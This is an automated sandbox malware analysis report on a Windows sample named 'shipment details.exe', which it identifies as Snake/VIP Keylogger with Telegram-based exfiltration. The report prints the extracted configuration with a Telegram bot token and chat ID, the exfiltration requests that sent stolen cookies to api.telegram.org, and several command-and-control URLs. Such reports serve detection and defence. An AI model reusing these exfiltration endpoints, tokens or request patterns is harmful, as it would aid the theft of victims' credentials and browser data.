Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
shipment details.exe

Overview

General Information

Sample name:shipment details.exe
Analysis ID:1529185
MD5:606686ad6a08ebe2cc694b5618cfaab5
SHA1:06f5f2c91d2a4c7e02547ed997a4db3b92352971
SHA256:f13526451639d7df1a8100047250b017cbfc065ce1271b6ffa30bc49de024d54
Tags:exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code references suspicious native API functions
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • shipment details.exe (PID: 5564 cmdline: "C:\Users\user\Desktop\shipment details.exe" MD5: 606686AD6A08EBE2CC694B5618CFAAB5)
    • shipment details.exe (PID: 4788 cmdline: "C:\Users\user\Desktop\shipment details.exe" MD5: 606686AD6A08EBE2CC694B5618CFAAB5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendMessage"}
{"Exfil Mode": "Telegram", "Bot Token": "7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8", "Chat id": "2135869667"}
{"Exfil Mode": "Telegram", "Token": "7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8", "Chat_id": "2135869667", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
  • 0x6dc6b:$x1: In$J$ct0r
00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
    00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          Click to see the 15 entries
          SourceRuleDescriptionAuthorStrings
          0.2.shipment details.exe.5420000.6.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x6be6b:$x1: In$J$ct0r
          0.2.shipment details.exe.3b4ad70.4.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x6be6b:$x1: In$J$ct0r
          0.2.shipment details.exe.5420000.6.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x6dc6b:$x1: In$J$ct0r
          0.2.shipment details.exe.3cf9060.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.shipment details.exe.3cf9060.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              Click to see the 40 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T18:21:08.091215+020028033053Unknown Traffic192.168.2.549709188.114.97.3443TCP
              2024-10-08T18:21:09.602566+020028033053Unknown Traffic192.168.2.549711188.114.97.3443TCP
              2024-10-08T18:21:12.107618+020028033053Unknown Traffic192.168.2.549717188.114.97.3443TCP
              2024-10-08T18:21:14.310424+020028033053Unknown Traffic192.168.2.549719188.114.97.3443TCP
              2024-10-08T18:21:19.864976+020028033053Unknown Traffic192.168.2.549725188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T18:21:05.525980+020028032742Potentially Bad Traffic192.168.2.549704158.101.44.24280TCP
              2024-10-08T18:21:07.510383+020028032742Potentially Bad Traffic192.168.2.549704158.101.44.24280TCP
              2024-10-08T18:21:08.729084+020028032742Potentially Bad Traffic192.168.2.549710158.101.44.24280TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8", "Chat_id": "2135869667", "Version": "4.4"}
              Source: 0.2.shipment details.exe.3cb5630.3.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8", "Chat id": "2135869667"}
              Source: shipment details.exe.4788.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendMessage"}
              Source: shipment details.exeReversingLabs: Detection: 36%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: shipment details.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: shipment details.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2
              Source: shipment details.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: shipment details.exe, 00000000.00000002.4520240685.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000000.00000002.4522683819.00000000053C0000.00000004.08000000.00040000.00000000.sdmp
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 0133F45Dh1_2_0133F2C0
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 0133F45Dh1_2_0133F4AC
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 0133FC19h1_2_0133F960
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BD31E0h1_2_06BD2DC8
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BD0D0Dh1_2_06BD0B30
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BD1697h1_2_06BD0B30
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BD2C19h1_2_06BD2968
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BDE959h1_2_06BDE6B0
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BDE0A9h1_2_06BDDE00
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BDF209h1_2_06BDEF60
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BDCF49h1_2_06BDCCA0
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BD31E0h1_2_06BD2DC2
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BDD7F9h1_2_06BDD550
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BDE501h1_2_06BDE258
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BDF661h1_2_06BDF3B8
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BDEDB1h1_2_06BDEB08
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BDD3A1h1_2_06BDD0F8
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BDFAB9h1_2_06BDF810
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_06BD0040
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BDDC51h1_2_06BDD9A8
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 4x nop then jmp 06BD31E0h1_2_06BD310E

              Networking

              barindex
              Source: unknownDNS query: name: api.telegram.org
              Source: Yara matchFile source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2009/10/2024%20/%2004:32:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135869667&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce87960e4dfa2Host: api.telegram.orgContent-Length: 1257
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
              Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49725 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 188.114.97.3:443
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2009/10/2024%20/%2004:32:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficDNS traffic detected: DNS query: 56.163.245.4.in-addr.arpa
              Source: unknownHTTP traffic detected: POST /bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135869667&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce87960e4dfa2Host: api.telegram.orgContent-Length: 1257
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 08 Oct 2024 16:21:20 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
              Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
              Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
              Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20a
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E1A000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62359
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
